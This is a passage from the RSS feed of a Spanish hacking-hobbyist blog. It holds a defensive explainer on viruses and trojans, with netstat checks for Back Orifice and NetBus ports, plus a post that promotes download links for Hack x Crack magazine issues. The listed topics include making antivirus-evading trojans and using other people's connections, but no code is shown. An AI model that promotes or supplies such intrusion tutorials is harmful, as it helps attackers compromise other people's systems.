src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=158&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2011/06/09/ataques-basados-en-desbordamiento-de-buffer-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
		<item>
		<title>He vuelto</title>
		<link>http://allabouthack.wordpress.com/2011/06/08/he-vuelto/</link>
		<comments>http://allabouthack.wordpress.com/2011/06/08/he-vuelto/#comments</comments>
		<pubDate>Wed, 08 Jun 2011 20:57:58 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Hack para novatos]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=144</guid>
		<description><![CDATA[El administrador de Allabouthack ( Nabster ) tras una larga temporada de inactividad en la web vuelve para darle unos pequeños ajustes a la web, es decir, cambiar el físico de la web y añadir o cambiar algunas cosas que se estan poniendo a la orden del día , un placer y un saludo. Nabster.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=144&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>El administrador de Allabouthack ( Nabster ) tras una larga temporada de inactividad en la web vuelve para darle unos pequeños ajustes a la web, es decir, cambiar el físico de la web y añadir o cambiar algunas cosas que se estan poniendo a la orden del día , un placer y un saludo. </p>
<p>Nabster.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/144/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/144/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/144/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/144/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/144/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/144/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/144/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/144/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=144&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2011/06/08/he-vuelto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
		<item>
		<title>Acceder a MySQL desde Visual C++</title>
		<link>http://allabouthack.wordpress.com/2009/01/13/acceder-a-mysql-desde-visual-c/</link>
		<comments>http://allabouthack.wordpress.com/2009/01/13/acceder-a-mysql-desde-visual-c/#comments</comments>
		<pubDate>Tue, 13 Jan 2009 19:27:54 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Acceder a MySQL desde visual C++]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=118</guid>
		<description><![CDATA[Cómo acceder a MySQL desde Visual C++ usando las API&#8217;s, paso a paso. Este tutorial se encuentra en formato PDF y nos muestra, paso a paso, cómo crear una pequeña aplicación en Visual C++ 6.0 con acceso a una base de datos de MySQL sin usar ODBC. Contenido del tutorial: Paso 1: Crear el proyecto [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=118&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h2>
</h2>
<h2 style="margin:auto 0;"><span style="font-weight:normal;font-size:9pt;color:black;font-family:Verdana;">Cómo acceder a <a href="http://allabouthack.wordpress.com/wp-admin/#" target="_blank"><span style="color:red;"><span style="color:#ff0000;">MySQL</span></span></a> desde Visual C++ usando las API&#8217;s, paso a paso. </span></h2>
<p><span style="font-size:9pt;color:black;font-family:Verdana;">Este tutorial se encuentra en formato PDF y nos muestra, paso a paso, cómo crear una pequeña aplicación en Visual C++ 6.0 con acceso a una <a href="http://allabouthack.wordpress.com/wp-admin/#" target="_blank"><span style="color:red;"><span style="color:#ff0000;">base de datos</span></span></a></span><span style="color:#ff0000;"><span style="font-size:9pt;color:red;font-family:Verdana;"> </span><span style="font-size:small;"><span style="font-family:Times New Roman;">de MySQL sin usar ODBC.</span></span></span></p>
<p><span style="font-size:9pt;color:black;font-family:Verdana;">Contenido del tutorial:</span></p>
<p><span style="font-size:9pt;color:black;font-family:Verdana;">Paso 1: Crear el proyecto<br />
Paso 2: Manos a la obra.<br />
Paso 3: Configurar las rutas<br />
Paso 4: Ajustar la configuración del proyecto.<br />
Paso 5: Crear la base de datos<br />
Paso 6: Escribir el código fuente<br />
Paso 7: Establecer la conexión<br />
Paso 8: Ejecutar la consulta.<br />
Paso 9: Resultados </span></p>
<h2 style="margin:auto 0;"><span style="color:#0000ff;"><span style="color:#008000;"><span style="font-weight:normal;font-size:9pt;color:green;font-family:Verdana;">Descargar aquí: </span></span><span style="color:#000000;"><span style="font-weight:normal;font-size:9pt;color:black;font-family:Verdana;"><a title="Tutorial acceder a MySQl desde visual C++" href="http://www.latindevelopers.com/files/6/mysqlapi.pdf" target="_blank"><span style="color:#800080;">http://www.latindevelopers.com/files/6/mysqlapi.pdf</span></a></span></span></span></h2></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/118/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/118/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/118/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=118&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2009/01/13/acceder-a-mysql-desde-visual-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>
	</item>
		<item>
		<title>Virus</title>
		<link>http://allabouthack.wordpress.com/2008/10/02/virus/</link>
		<comments>http://allabouthack.wordpress.com/2008/10/02/virus/#comments</comments>
		<pubDate>Thu, 02 Oct 2008 15:29:27 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=114</guid>
		<description><![CDATA[En este apartado propucarare explicar todo sobre los virus como evitarlos etc&#8230; VIRUS Y TROYANOS El objetivo de los virus, la mayoría de las veces es destructivo, pero no siempre. En ocasiones son obras maestras de la programación, que persiguen el reto de aprender o de demostrar los fallos de seguridad, de sistemas operativos o [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=114&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<table border="0" width="1" cellpadding="0" cellspacing="0">
<tr>
<td><a href="http://espana.cittys.com"><img src="http://contadores.jubbee.com/ztau2.php?ida=-572397349" border="0" alt="Anuncios" height="16"/></a></td>
<td><a href="http://www.campusanuncios.com/"><img src="http://contadores.jubbee.com/tau2.php?ida=-572397349" border="0" alt="anuncios" height="16"/></a></td>
<td><a href="http://www.campusanuncios.com/Ofertahabitacion-Madrid-4-6.html"><img src="http://contadores.jubbee.com/hun2.php?ida=-572397349" border="0" alt="pisos madrid" height="16"/></a></td>
<td><a href="http://www.amigando.com/"><img src="http://contadores.jubbee.com/zen2.php?ida=-572397349" border="0" alt="contactar" height="16"/></a></td>
<td><a href="http://contactos.vivito.net/"><img src="http://contadores.jubbee.com/ein2.php?ida=-572397349" border="0" alt="contactos" height="16"/></a></td>
</tr>
</table>
<p>En este apartado propucarare explicar todo sobre los virus como evitarlos etc&#8230;</p>
<p>VIRUS Y TROYANOS</p>
<p>El objetivo de los virus, la mayoría de las veces es destructivo, pero no siempre. En ocasiones son obras maestras de la programación, que persiguen el reto de aprender o de demostrar los fallos de seguridad, de sistemas operativos o Internet. Programados en código máquina o diferentes códigos de programación, los virus son cada vez más potentes y afectan a más archivos, como lo demuestra hispasec (www.hispasec.com) con OUTLOOK.PDFWorm, el primer gusano que se presenta en un archivo PDF (Portable Document Format), el conocido formato de Adobe Acrobat. </p>
<p align="center"><a href="http://centros1.pntic.mec.es/cp.princesa.sofia/historia.html" target="blank"><img src="http://centros1.pntic.mec.es/cp.princesa.sofia/mibanani.gif" width="468" height="60" alt="Minglanilla, la sal de Castilla"/></a></p>
<p>Acceso Uno: Qué es un virus</p>
<p>-Programas creados con distintos lenguajes de programación o código de máquina (es el lenguaje más elemental que el ordenador es capaz de interpretar).Cuando se activa (previamente el usuario a ejecutado dicho virus, en forma de fichero con distintas extensiones ejecutables) el virus comienza su infección, entra en acción el código, que dependiendo de su programación, será más o menos destructivo, provocando problemas al sistema informático del usuario. Se comportan a veces de forma similar a los biológicos, aunque hay una diferencia muy clara. Los virus informáticos siempre se introducen en el sistema cuando el usuario los ejecuta. Por lo tanto si tenemos un antivirus actualizado y NO ejecutamos archivos de procedencia sospechosa, desconocida, podemos estar a salvo de estos virus con un porcentaje muy alto. Los biológicos es distinto, todos sabemos que nos podemos cuidar perfectamente y por el simple echo de respirar un aire acondicionado contaminado nos puede entrar un virus. Pero creadores de estos programas informáticos víricos, en ocasiones, podemos encontrar obras de &#8220;ingenieria social&#8221; que da lugar a que el usuario ejecute un virus sin practicamente darse cuenta. De este dato hablaremos más adelante en la sección de troyanos.</p>
<p>Acceso Dos: Como evitarlos</p>
<p>-Es conveniente tener un antivirus actualizado. Y cada vez que instalamos por ejemplo un programa desde disquete o CD-ROM u otro soporte, revisarlo con el antivirus. Algunos programas incluyen método heurístico y la posibilidad de analizar todos los ficheros. Si tenemos sospechas, es recomendable indicar estas opciones. El método heurístico busca cadenas sospechosas en los archivos, en busca de posibles virus que en ese momento son desconocidos.</p>
<p>-Tener precaución con el correo electrónico, con los ficheros adjuntos. No ejecutarlos si la procedencia es desconocida. Incluso si conocemos el destinatario, puede ser un virus pero esta persona NO tiene porque ser el responsable. Hay virus, en este caso denominados gusanos, que infectan el sistema de tal forma que se autoenvian a los contactos de la libreta de direcciones (sobre todo si utilizamos Outlook Express). Por lo tanto simplemente cada vez que nos envien un fichero adjunto, lo revisamos con el antivirus para evitarnos problemas.</p>
<p>-Hay muchos tipos de virus, pero para resumir se puede decir que cualquier fichero que se ejecute puede tener un código vírico, porque las técnicas de programación, estan avanzando cada vez mas. Los ficheros ejecutables más comunes que pueden tener código dañino son: .exe .com .js .bat .sys librerias de windows .dll archivos .html .doc (de microsoft word los famosos virus de &#8220;macro&#8221;) archivos .html con código en JavaScript o insertado con controles ActiveX&#8230;Incluso ficheros con extension .sam (AmiPro) y ficheros .src (los &#8220;salvapantallas&#8221; o protectores de pantalla) y como indicaba al principio ficheros PDF y prácticamente la extensión de los archivos va en aumento.Tambien son conocidos virus que afectan a CorelDraw y troyanos que hablaremos a continuacion que se propagan a traves del programas de chat (el mas conocido mIRC) o a traves de los ficheros ejecutables que he indicado.</p>
<p>Para concluir el &#8220;acceso dos&#8221; se podría decir que teniendo un antivirus actualizado con protección para Internet (ya he indicado que hay virus .html extension de ficheros web y programados en java) y tenemos precaución en no ejecutar ficheros sospechosos, podemos evitar dichos &#8220;programas viricos&#8221; (pero al 100 es complicado&#8230;)</p>
<p>Acceso Tres: ¿Qué son los troyanos? </p>
<p><a href="http://dmoz.org/" target="_top"><img src="http://dmoz.org/user-banners/odp_anim3.gif" alt="Open Directory Project at dmoz.org" width="88" height="31"/></a></p>
<p>No son virus como tales, pero pueden realizar acciones destructivas como algunos virus. Los más peligrosos constan de dos programas, un servidor y un cliente. El servidor es por ejemplo nuestro Ordenador (para hacernos una idea) y el cliente es el usuario que intenta &#8220;entrar&#8221; en nuestro Ordenador, una vez que ha entrado, en función de las características de dicho troyano, puede borrar archivos de nuestro disco duro, formatearlo, abril la unidad de cd-rom, realizar capturas de nuestro escritorio, de lo que tecleamos, hay troyanos que &#8220;copian&#8221; el archivo .PWL que es donde el sistema windows guarda las contraseñas y las envia a una dirección de correo electrónico.</p>
<p>Un troyano muy conocido es Back Orifice conocido como BO. Creado por el grupo &#8220;Cult of the Dead Cow&#8221; (culto a la vaca muerta). Está en la lista &#8220;In The Wild&#8221; que es una recopilación de los virus o troyanos más importantes y que más propagación han tenido. Sus autores quieren demostrar los fallos de seguridad de win 95/98.Y muy conocido es NetBus y SubSeven que disponen de varias versiones. BO incluso tiene &#8220;plugins&#8221; para mejorar sus acciones.</p>
<p>Acceso Cuatro: Como evitar a Back Orifice </p>
<p>La aplicación netstat nos pude ser de gran ayuda. Sirve para darnos información del protocolo TCP/UDP y TCP/IP. Este comando con -a nos da información de todas las conexiones y puertos en escucha Para comprobar si tenemos el troyano Back Orifice, desde MS_DOS por ejemplo, tecleamos: netstat -an |find &#8220;UDP&#8221; Si la información que nos da es la siguiente: UDP 0.0.0.0:31337 *.* podemos tener la seguridad que tenemos instalado el servidor de &#8220;Back Orifice&#8221; en nuestro Ordenador. También, con la orden desde ms-dos netstst -an te da toda la información, prueba dichas ordenes y verás todos tus puertos (mientras estas conectado a internet). Por ejemplo el troyano NetBus utiliza el puerto TCP 12345. En la web: http://www.hispasec.com tienes más información de cómo evitar este tipo de programas. Son analizados otros troyanos conocidos como NetBus y DeepThroat.</p>
<p>Estos &#8220;Caballos de troya&#8221; suelen estar contenidos en programas ejecutables y a traves de chat, por ejemplo mIRC nos pueden enviar este tipo de &#8220;programas&#8221;, o a traves de ICQ (cuidado con la seguridad de dicho programa). Normalmente se quedan residentes en memoria y se introduce código en el registro de windows para que cada vez que encendamos el Ordenador lo tengamos &#8220;activo&#8221;.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/114/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/114/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/114/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=114&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2008/10/02/virus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>

		<media:content url="http://contadores.jubbee.com/ztau2.php?ida=-572397349" medium="image">
			<media:title type="html">Anuncios</media:title>
		</media:content>

		<media:content url="http://contadores.jubbee.com/tau2.php?ida=-572397349" medium="image">
			<media:title type="html">anuncios</media:title>
		</media:content>

		<media:content url="http://contadores.jubbee.com/hun2.php?ida=-572397349" medium="image">
			<media:title type="html">pisos madrid</media:title>
		</media:content>

		<media:content url="http://contadores.jubbee.com/zen2.php?ida=-572397349" medium="image">
			<media:title type="html">contactar</media:title>
		</media:content>

		<media:content url="http://contadores.jubbee.com/ein2.php?ida=-572397349" medium="image">
			<media:title type="html">contactos</media:title>
		</media:content>

		<media:content url="http://centros1.pntic.mec.es/cp.princesa.sofia/mibanani.gif" medium="image">
			<media:title type="html">Minglanilla, la sal de Castilla</media:title>
		</media:content>

		<media:content url="http://dmoz.org/user-banners/odp_anim3.gif" medium="image">
			<media:title type="html">Open Directory Project at dmoz.org</media:title>
		</media:content>
	</item>
		<item>
		<title>Creative Commons</title>
		<link>http://allabouthack.wordpress.com/2008/10/01/creative-commons/</link>
		<comments>http://allabouthack.wordpress.com/2008/10/01/creative-commons/#comments</comments>
		<pubDate>Wed, 01 Oct 2008 13:00:00 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Creative Commons]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=97</guid>
		<description><![CDATA[Los articulos de esta web estan bajo licencia de Creative Commons<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=97&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>En mis articulos hay licencia de creative commons de tal modo mis articulos no podrán salir de aquí.</p>
<p><a rel="license" href="http://creativecommons.org/licenses/by-nc-nd/2.5/es/"><img alt="Creative Commons License" style="border-width:0;" src="http://i.creativecommons.org/l/by-nc-nd/2.5/es/88x31.png" /></a><br /><span>Como hackear</span> by <a href="http://allabouthack.wordpress.com/como_hackear" rel="attributionURL">Como hackear</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-nd/2.5/es/">Creative Commons Reconocimiento-No comercial-Sin obras derivadas 2.5 Espa&#241;a License</a>.<br />Based on a work at <a href="http://allabouthack.wordpress.com/como_hackear" rel="source">allabouthack.wordpress.com</a>.<br />Permissions beyond the scope of this license may be available at <a href="http://allabouthack.wordpress.com" rel="morePermissions">http://allabouthack.wordpress.com</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/allabouthack.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/allabouthack.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/allabouthack.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/allabouthack.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/allabouthack.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/allabouthack.wordpress.com/97/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/allabouthack.wordpress.com/97/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/allabouthack.wordpress.com/97/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=97&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://allabouthack.wordpress.com/2008/10/01/creative-commons/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/1efffec6003e581178c69d44adf469ca?s=96&#38;d=monsterid&#38;r=X" medium="image">
			<media:title type="html">Mazingerzeta</media:title>
		</media:content>

		<media:content url="http://i.creativecommons.org/l/by-nc-nd/2.5/es/88x31.png" medium="image">
			<media:title type="html">Creative Commons License</media:title>
		</media:content>
	</item>
		<item>
		<title>Aprende a hacker gracias a la revista hack x crack</title>
		<link>http://allabouthack.wordpress.com/2008/09/30/aprende-a-hacker-gracias-a-la-revista-hack-x-crack/</link>
		<comments>http://allabouthack.wordpress.com/2008/09/30/aprende-a-hacker-gracias-a-la-revista-hack-x-crack/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 20:44:00 +0000</pubDate>
		<dc:creator>Nabster</dc:creator>
				<category><![CDATA[Aprende a hacker]]></category>

		<guid isPermaLink="false">http://allabouthack.wordpress.com/?p=94</guid>
		<description><![CDATA[Bueno aquí de nuevo publico este articulo , respetando derechos de autor lo encontré en un foro llamado forohack estube leyendo me descargue las revistas y son interesantes de tal modo que las publicaré aquí. Esta no es una revista más, por primera vez tenéis ante vosotros una publicación LIBRE que os ofrecerá la posibilidad [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=allabouthack.wordpress.com&amp;blog=1956923&amp;post=94&amp;subd=allabouthack&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.es-facil.com/ganar/alta?Id=64937221" target="_blank"><br />
<img src="http://banners.es-facil.com/muestra_banner.php?c=64937221000"/></a></p>
<p>Bueno aquí de nuevo publico este articulo , respetando derechos de autor lo encontré en un foro llamado <strong>forohack</strong> estube leyendo me descargue las revistas y son interesantes de tal modo que las publicaré aquí.</p>
<p>Esta no es una revista más, por primera vez tenéis ante vosotros una publicación LIBRE que os ofrecerá la posibilidad de explorar la red tal y como debe explorarse<br />
Esta publicación responde a la pregunta más veces expuesta en LA RED: ¿Cómo puedo ser un hacker?<br />
Nuestro objetivo es: ACABAR CON LA BASURA DE LA RED (lamers y demás &#8220;esencias&#8221; ) con el único método que conocemos: LA EDUCACIÓN y con una única bandera que será por siempre nuestra firma: SOLO EL CONOCIMIENTO TE HACE LIBRE.</p>
<p>Estos son nuestros pilares: LA EDUCACIÓN Y EL CONOCIMIENTO. Para ser un HACKER solo hace falta dos cosas: curiosidad y medios, a partir de ahora la curiosidad deberéis ponerla VOSOTROS, porque los medios los facilitaremos NOSOTROS. En las siguientes líneas os descubrimos cómo podremos conseguir nuestros objetivos y definimos algunas de las palabras que más han sido violadas y retorcidas en su significado.</p>
<p>Hacker: Este término ha sufrido a lo largo de su corta historia una horrible conspiración perpetrada por la ignorancia de los medio, eso que personalmente llamo &#8220;periodismo de telediario&#8221; (en clara alusión a los ridículos artículos que no hacen más que intoxicar nuestra percepción de las cosas e insultar nuestra inteligencia). Este tipo de periodismo unido a &#8220;otros poderes&#8221;, desde los monopolios que deben justificar su incompetencia hasta los gobiernos que deben justificar sus intereses ocultos pasando por la industria del cine y los medios informativos &#8220;de masas&#8221;.</p>
<p>Pues bien, HACKER no es más que una persona que posee conocimientos avanzados sobre una materia en concreto, normalmente relacionados con la tecnología aunque ni mucho menos limitado a elllo. Ponen sus aptitudes al servicio de un único objetivo: EL CONOCIMIENTO. Desean conocer el funcionamiento de &#8220;las cosas&#8221; y no encuentran límites en su camino más que su propia curiosidad. No se dedican a destruir ni a causar estragos entre sus &#8220;victimas&#8221;, no se dedican a robar ni a chantajear ni a regodearse de sus &#8220;conquistas&#8221;, muy al contrario suelen advertir a terceros de las debilidades de sus sistemas y, desgraciadamente, esos &#8220;terceros&#8221; en lugar de agradecerles su aviso se dedican a denunciarlos o perseguirlos&#8230;. aunque no siempre es así, por supuesto, muchas compañias y gobiernos han aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores (o empleados) de estos. BILL GATES es un HACKER (el papá ventanas), como Linus Torvalds (el papá Linux) o Grace Hooper (la Almirante, creadora del lenguaje COBOL), los autores del COREWAR, Robert Thomas Morris, Douglas McIlroy y Victor Vysottsky (precursores de los creadores de virus informáticos), y muchos más. ¿Cómo? ¿Pero no hemos dicho que los hackers no cometen delitos? Pues NO, vuelve a leer su definición&#8230;..pero claro, de todo hay en la viña del señor y al igual que hay delincuentes entre el clero hay hackers que en un momento u otro han caído en la ilegalidad, nadie es perfecto!!! &#8230;.. y Bill Gates es un HACKER? Por supuesto, solo tienes que leerte su biografía. ¿Sorprendido? Espero que no, porque eso no es nada más que un cero a la izquierda en comparación con lo que vas a encontrar en esta revista.</p>
<p>En vez de juntar todos los números en un único, o dos o tres archivos, las he puesto para descargar una por una por si hay alguien que quiere bajarse unos números determinados, aunque es recomendable bajarse todos los números</p>
<p>en mi opinión y en la de muchos es la mejor revista para aprender hacking, ya que explica las cosas de manera sencilla, y en principio no muy técnica, para que vayas asimilando conceptos poco a poco, y que luego a la hora de tener que leer artículos realmente técnicos y pesados de leer te sea mucho más fácil comprenderlos.</p>
<p>Ningún libro en la red puede enseñarte lo que se enseña aquí de la manera sencilla en que es explicado, muy útil tambien para los que buscan seguridad en internet, por aquello, de ver bajo la mirada del enemigo, si aprendes a mirar a tu sistema, de la manera en que lo ve un hacker, te será mucho más fácil de proteger que cómo lo haces ahora con un antivirus y un cortafuegos, que pueden ser saltados con suma facilidad! todo eso y mucho más aquí lo aprenderás, aquí comparto con vosotros pues los 30 números de hackxcrack, y en el número 30 número va incluído en un documenteo de texto el foro actual al que puedes dirigir tu consultas según hagas los ejercicios de esta revista, no se puede pedir más&#8230;&#8230;.</p>
<p><span style="color:#ff0000;">EN ESTE POST ESTAN LOS LINKS EN UNA CUENTA PREMIUM EN RAPIDSHARE (NO CADUCAN LOS ENLACES NUNCA)<img src="http://www.foromsn.net/Caras/Guino.gif" alt="" /><span style="color:#ff0000;"><a href="http://www.foromsn.com/index.php?Ver=Mensaje&amp;Id=235987&amp;WebOrigen=1" target="_blank"><span style="color:#ffcc99;">Descarga las revistas de HackXCraCk aki!! Link&#8217;s resubidos con cuenta Premium!!</span></a></p>
<p></span></span></p>
<p> </p>
<p><strong>Cuaderno 1:</strong></p>
<p>-Crea tu primer troyano indetectable por los antivirus<br />
-FXP:sin limite de velocidad, utilizando conexiones ajenas<br />
-Los secretos del FTP<br />
-Esquivando firewalls<br />
-Pass mode versus port mode</p>
<p><a href="http://rapidshare.com/files/416505/Cuadernos_HackxCrack_Numero_1.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/416505/C&#8230;k_Numero_1.rar</span></a></p>
<p><strong>Cuaderno 2:</strong><br />
-Code/decode bug (como hackear servidores paso a paso)<br />
-Ocultacion de ip: primeros pasos<br />
-Aznar al frente de la gestapo digital</p>
<p><a href="http://rapidshare.com/files/459550/Cuadernos_HackxCrack_Numero_2.pdf.rar" target="_blank"><span style="color:#ffcc99;">http://rapidshare.com/files/459550/C&#8230;mero_2.pdf.rar</span></a></p>
<p><strong>Cuaderno 3:</strong><br />
-Ocultando nuestra ip, encadenando proxys<br />
